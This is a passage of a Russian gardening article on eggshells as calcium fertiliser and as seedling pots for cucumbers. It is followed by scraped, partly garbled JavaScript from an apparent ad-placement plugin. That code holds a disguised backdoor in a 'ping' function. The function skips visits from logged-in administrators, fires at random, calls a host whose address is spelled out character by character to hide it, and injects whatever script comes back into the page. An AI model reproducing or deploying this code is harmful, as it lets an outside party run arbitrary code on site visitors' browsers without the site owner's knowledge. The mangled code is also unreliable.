«Скорлупу можно подсыпать в грунт вместе с минеральными удобрениями, которые повышают кислотность грунта. Например, сернокислый аммоний, аммиачная селитра, сернокислый калий, коллоидная сера. На кислых грунтах их не рекомендуют использовать, но и отказаться от этих подкормок не всегда получается. Скорлупа компенсирует закисление и сама по себе полезна».

«Распространенный совет выращивать рассаду в скорлупе нельзя воспринимать как подкормку. Слишком крупные куски скорлупы остаются в грунте, чтобы растения могли усвоить из них кальций в текущем сезоне. Конечно, постепенное улучшение почвы происходить будет, но не сразу. Зато такое выращивание, когда растения высаживают в открытый грунт прямо в этих «горшочках», полезно тем, что корни не травмируются при пересадке. Рассада огурцов с трудом адаптируется на новом месте, поэтому метод хороший. Главное, не забыть смять перед высадкой скорлупу пальцами (легонько, чтобы не повредить корни). Еще один бонус – крупные фрагменты скорлупы защитят огурцы от медведки, но нужно хорошо вымыть и высушить скорлупки перед посадкой, чтобы не развивалась болезненная микрофлора».

Яичная скорлупа – натуральный и доступный продукт для подкормки кальцием и микроэлементами томатов, огурцов и других огородных культур. В отличие от минеральных аналогов подкормки (кальциевая селитра), улучшает не только химические, но и физико-механические показатели грунта, действуя как разрыхлитель. При использовании скорлупы от домашних яиц гарантируется и экологическая чистота сырья.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};